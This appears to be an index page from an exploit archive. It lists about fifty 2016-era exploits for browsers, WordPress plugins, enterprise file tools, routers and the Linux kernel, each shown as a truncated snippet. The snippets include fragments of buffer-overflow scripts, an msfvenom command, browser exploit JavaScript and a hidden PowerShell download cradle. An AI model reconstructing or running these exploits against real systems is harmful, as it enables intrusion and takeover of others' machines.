Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)

Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption MS16-068 Source: http://blog.skylined.nl/20161205001.html Synopsis A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I...

WordPress Plugin Single Personal Message 1.0.3 - SQL Injection

WordPress Plugin Single Personal Message 1.0.3 - SQL Injection Exploit Title: Single Personal Message 1.0.3 – Plugin WordPress – Sql Injection Date: 28/11/2016 Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/simple-personal-message/ Software Link:...

Dup Scout Enterprise 9.1.14 - Remote Buffer Overflow (SEH)

Dup Scout Enterprise 9.1.14 - Remote Buffer Overflow SEH !/usr/bin/python Open the DupScout client and click on Tools click on Connect Network Drive type the content of boom.txt in the "User Name" field. The payload is sent to the DupScout server port 9126 SEH based stack overflow in DupScout...

DiskBoss Enterprise 7.4.28 - GET Remote Buffer Overflow

DiskBoss Enterprise 7.4.28 - GET Remote Buffer Overflow !/usr/bin/python import socket,os,time SEH Stack Overflow in GET request DiskBoss Enterprise 7.4.28 Tested on Windows XP SP3 & Windows 7 Professional For educational proposes only host = "192.168.1.20" port = 80 badchars \x00\x09\x0a\x0d\x20...

NetCat 0.7.1 - Denial of Service

NetCat 0.7.1 - Denial of Service /usr/bin/python -- Coding: utf-8 -- GNU Netcat 0.7.1 - Out of bounds array write Access Violation by n30m1nd Date: 2016-11-19 Exploit Author: n30m1nd Vendor Homepage: http://netcat.sourceforge.net/ Software Link:...

Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities

Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities Exploit Title : Shuttle Tech ADSL WIRELESS 920 WM - Multiple Vulnerabilities Version: Gan9.8U6X-B-TW-R1B0201T1RP Exploit Author : Persian Hack Team Tested on Win Date 2016/12/05 1. Cross Site Scripting PoC : First We Need To login To...

Microsoft Event Viewer 1.0 - XML External Entity Injection

Microsoft Event Viewer 1.0 - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EVENT-VIEWER-XXE-FILE-EXFILTRATION.txt + ISR: ApparitionSec + CVE: CVE-2019-0948 Vendor: ===============...

Apache CouchDB 2.0.0 - Local Privilege Escalation

Apache CouchDB 2.0.0 - Local Privilege Escalation + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/APACHE-COUCHDB-LOCAL-PRIVILEGE-ESCALATION.txt + ISR: ApparitionSec Vendor: ================== couchdb.apache.org Product:...

Microsoft MSINFO32.EXE 6.1.7601 - .NFO XML External Entity Injection

Microsoft MSINFO32.EXE 6.1.7601 - .NFO XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt + ISR: ApparitionSec Vendor: =================...

Microsoft Excel Starter 2010 - XML External Entity Injection

Microsoft Excel Starter 2010 - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-STARTER-XXE-REMOTE-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: =================...

Microsoft Windows Media Center 6.1.7600 - ehshell.exe XML External Entity Injection

Microsoft Windows Media Center 6.1.7600 - ehshell.exe XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor:...

Alcatel Lucent Omnivista 8770 - Remote Code Execution

Alcatel Lucent Omnivista 8770 - Remote Code Execution import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object...

Microsoft Authorization Manager 6.1.7601 - azman XML External Entity Injection

Microsoft Authorization Manager 6.1.7601 - azman XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-AZMAN-XXE-FILE-EXFILTRATION.txt + ISR: ApparitionSec Vendor: ==================...

BlackStratus LOGStorm 4.5.1.354.5.1.96 - Remote Code Execution

BlackStratus LOGStorm 4.5.1.354.5.1.96 - Remote Code Execution !/usr/bin/python logstorm-root.py BlackStratus LOGStorm Remote Root Exploit Jeremy Brown jbrown3264/gmail Dec 2016 -Synopsis- "Better Security and Compliance for Any Size Business" BlackStratus LOGStorm has multiple vulnerabilities th...

Smart Guard Network Manager 6.3.2 - SQL Injection

Smart Guard Network Manager 6.3.2 - SQL Injection Exploit Title: SQL Injection In Smart Guard Network Manager Api Date: 03/12/2016 Exploit Author: Rahul Raz Vendor Homepage: http://www.xsinfoways.com/ Software Name: Smart Guard Network Manager Version: 6.3.2 Tested on: Ubuntu Linux Vulnerability...

Xfinity Gateway - Remote Code Execution

Xfinity Gateway - Remote Code Execution Exploit Title: Xfinity Gateway: Remote Code Execution Date: 12/2/2016 Exploit Author: Gregory Smiley Contact: [email protected] Vendor Homepage: http://xfinity.com Platform: php The page located at /networkdiagnostictools.php has a feature called test...

Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow

Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow !/usr/bin/python import socket,os,time SEH Stack Overflow in GET request Disk Savvy Enterprise 9.1.14 Tested on Windows XP SP3 && Windows 7 Professional host = "192.168.1.20" port = 80 badchars \x00\x09\x0a\x0d\x20 msfvenom -a x86 --platfo...

Tor (Firefox 41 50) - Code Execution

Tor Firefox 41 50 - Code Execution TOR Browser 0day : JavaScript Exploit ! Works on Firefox versions 41 - 50 The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50. When...

Broadcom BCM43xx Wi-Fi - BroadPWN Denial of Service

Broadcom BCM43xx Wi-Fi - BroadPWN Denial of Service This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn...

Xitami Web Server 5.0a0 - Denial of Service

Xitami Web Server 5.0a0 - Denial of Service !/usr/bin/env python X5 Webserver 5.0 Remote Denial Of Service Exploit Vendor: iMatrix Product web page: http://www.xitami.com Affected version: 5.0a0 Summary: X5 is the latest generation web server from iMatix Corporation. The Xitami product line...

WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion

WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion Exploit Title: WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion Date: 28/11/2016 Exploit Author: Lenon Leite Vendor Homepage: https://wordpress.org/plugins/wp-vault/ Software Link: https://wordpress.org/plugins/wp-vault/ Contact:...

Xfinity Gateway - Cross-Site Request Forgery

Xfinity Gateway - Cross-Site Request Forgery EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY AUTHOR: Pabstersac DATE: 1ST OF AUGUST 2016 CVE: N/A CATEGORY: REMOTE CONTACT: [email protected] IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME. CSRF FOR COMCAST...

WinPower 4.9.0.4 - Local Privilege Escalation

WinPower 4.9.0.4 - Local Privilege Escalation // Exploit Title: WinPower V4.9.0.4 Privilege Escalation // Date: 29-11-2016 // Software Link: http://www.ups-software-download.com/ // Exploit Author: Kacper Szurek // Contact: http://twitter.com/KacperSzurek // Website: http://security.szurek.pl/ //...

NTP 4.2.8p3 - Denial of Service

NTP 4.2.8p3 - Denial of Service !/usr/bin/env python Exploit Title: ntpd 4.2.8p3 remote DoS Date: 2015-10-21 Bug Discovery: John D "Doug" Birdwell Exploit Author: Magnus Klaaborg Stubman @magnusstubman Website: http://support.ntp.org/bin/view/Main/NtpBug2922 Vendor Homepage: http://www.ntp.org/...

Microsoft Internet Explorer 891011 - MSHTML DOMImplementation Type Confusion (MS16-009)

Microsoft Internet Explorer 891011 - MSHTML DOMImplementation Type Confusion MS16-009 Source: http://blog.skylined.nl/20161128001.html Synopsis A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be...

Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow

Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow !/usr/bin/python print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...

Disk Pulse Enterprise 9.1.16 - Login Remote Buffer Overflow

Disk Pulse Enterprise 9.1.16 - Login Remote Buffer Overflow !/usr/bin/python print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...

VX Search Enterprise 9.1.12 - Login Remote Buffer Overflow

VX Search Enterprise 9.1.12 - Login Remote Buffer Overflow !/usr/bin/python print "VX Search Enterprise 9.1.12 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM...

Dup Scout Enterprise 9.1.14 - Login Remote Buffer Overflow

Dup Scout Enterprise 9.1.14 - Login Remote Buffer Overflow !/usr/bin/python print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM...

Disk Savvy Enterprise 9.1.14 - Login Remote Buffer Overflow

Disk Savvy Enterprise 9.1.14 - Login Remote Buffer Overflow !/usr/bin/python print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYST...

Microsoft Internet Explorer 8 - MSHTML SRun­Pointer::Span­QualifierRun­Type Out-Of-Bounds Read (MS15-009)

Microsoft Internet Explorer 8 - MSHTML SRun­Pointer::Span­QualifierRun­Type Out-Of-Bounds Read MS15-009 position­fixed position: fixed; position­relative position: relative; float­left float: left; complex float: left; width: 100%; complex:first-line clear: left; window.onload = function boom...

Sync Breeze Enterprise 9.1.16 - Login Remote Buffer Overflow

Sync Breeze Enterprise 9.1.16 - Login Remote Buffer Overflow !/usr/bin/python print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...

Google Android - BadKernel Remote Code Execution

Google Android - BadKernel Remote Code Execution function gc forvar i=0;i0.toString16; function log var str = ""; forvar i=0;i"; console.logstr; document.writestr; function setaccessaddressaddress controllerdv.setUint3234,address,true; controllerdv.setUint3244,0x40000000,true; function...

TendaDlinkTplink TD-W8961ND - DHCP Cross-Site Scripting

TendaDlinkTplink TD-W8961ND - DHCP Cross-Site Scripting Document Title: =============== Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=1990 Release Date: ============= 2016-11-28 Vulnerability...

Microsoft Internet Explorer 11 - MSHTML CGenerated­Content::Has­Generated­SVGMarker Type Confusion

Microsoft Internet Explorer 11 - MSHTML CGenerated­Content::Has­Generated­SVGMarker Type Confusion window.onload = function document.get­Elements­By­Tag­Name"iframe"0.src = "repro-iframe.html"; Description Internally MSIE uses various lists of linked CTree­Pos objects to represent the DOM tree. F...

Linux Kernel 2.6.22 3.9 - Dirty COW PTRACE_POKEDATA Race Condition Privilege Escalation (etcpasswd Method)

Linux Kernel 2.6.22 3.9 - Dirty COW PTRACEPOKEDATA Race Condition Privilege Escalation etcpasswd Method // // This exploit uses the pokemon exploit of the dirtycow vulnerability // as a base and automatically generates a new passwd line. // The user will be prompted for the new password when the...

Red Hat JBoss EAP - Deserialization of Untrusted Data

Red Hat JBoss EAP - Deserialization of Untrusted Data Security Advisory @ Mediaservice.net Srl 05, 23/11/2016 Data Security Division Title: Red Hat JBoss EAP deserialization of untrusted data Application: JBoss EAP 5.2.X and prior versions Description: The application server deserializes untruste...

Microsoft Internet Explorer 10 - MSHTML CEdit­Adorner::Detach Use-After-Free (MS13-047)

Microsoft Internet Explorer 10 - MSHTML CEdit­Adorner::Detach Use-After-Free MS13-047 var o­Window = window.open"window.xhtml"; set­Intervalfunction try o­Window.eval"" + function document.design­Mode = "on"; document.exec­Command"Select­All"; var o­Selection = window.get­Selection;...

Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities

Trend Micro InterScan Web Security Virtual Appliance IWSVA 6.5 - Multiple Vulnerabilities Exploit Title: Trend Micro Interscan Web Security Virtual Appliance IWSVA 6.5.x Multiple Vulnerabilities Date: 28/11/2016 Exploit Author: SlidingWindow , Twitter: @KapilKhot Vendor Homepage:...

Core FTP LE 2.2 - SSHSFTP Remote Buffer Overflow (PoC)

Core FTP LE 2.2 - SSHSFTP Remote Buffer Overflow PoC + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt + ISR: ApparitionSec Vendor: =============== www.coreftp.com Product:...

Linux Kernel 2.6.22 3.9 - Dirty COW procselfmem Race Condition Privilege Escalation (etcpasswd Method)

Linux Kernel 2.6.22 3.9 - Dirty COW procselfmem Race Condition Privilege Escalation etcpasswd Method // EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil // EDB-Note: Recommended way to run: ./dcow -s Will automatically do "echo 0...

Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (1)

Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation MS16-135 1 Complete Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40823.zip Presentation:...

GNU Wget 1.18 - Access List Bypass Race Condition

GNU Wget 1.18 - Access List Bypass Race Condition ''' ============================================= - Discovered by: Dawid Golunski - dawidatlegalhackers.com - https://legalhackers.com - https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html - CVE-2016-7098 -...

osTicket 1.9.14 - X-Forwarded-For Cross-Site Scripting

osTicket 1.9.14 - X-Forwarded-For Cross-Site Scripting Exploit Title: Osticket 1.9.14 and below X-Forwarded-For Stored XSS. Date: 24-11-2016 Exploit Author: Joaquin Ramirez Martinez i0-SEC Software Link: http://osticket.com/ Vendor: Osticket """ ============== DESCRIPTION ============== osTicket ...

Remote Utilities Host 6.3 - Denial of Service

Remote Utilities Host 6.3 - Denial of Service Exploit Title: Remote Utilities - Host 6.3 - Denial of Service Date: 2016-11-25 Exploit Author: Peter Baris Vendor Homepage: www.remoteutilities.com Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip Version: 6.3.0.6 - other...

Linux Kernel 2.6.32-6423.16.0-4 - inode Integer Overflow

Linux Kernel 2.6.32-6423.16.0-4 - inode Integer Overflow / Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC The inode is a data structure in a Unix-style file system which describes a filesystem object such as a file or a directory. Each inode stores the attributes and disk block...

UCanCode - Multiple Vulnerabilities

UCanCode - Multiple Vulnerabilities UCanCode multiple vulnerabilities Url: http://www.hmi-software.com/ http://www.ucancode.net/index.htm http://www.ucancode.net/bbs/zhuce/login.htm Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS,...

Ubuntu 14.0415.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation

Ubuntu 14.0415.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation Source: http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/ Introduction Problem description: Linux user namespace allows to mount file systems as normal user, including the...

Crestron AM-100 - Multiple Vulnerabilities

Crestron AM-100 - Multiple Vulnerabilities ================================================================= Crestron AM-100 Multiple Vulnerabilities ================================================================= Date: 2016-08-01 Exploit Author: Zach Lanier Vendor Homepage:...

Ubuntu 15.10 - USERNS Overlayfs Over Fuse Privilege Escalation

Ubuntu 15.10 - USERNS Overlayfs Over Fuse Privilege Escalation Source: http://www.halfdog.net/Security/2016/OverlayfsOverFusePrivilegeEscalation/ Introduction Problem description: On Ubuntu Wily it is possible to place an USERNS overlayfs mount over a fuse mount. The fuse filesystem may contain...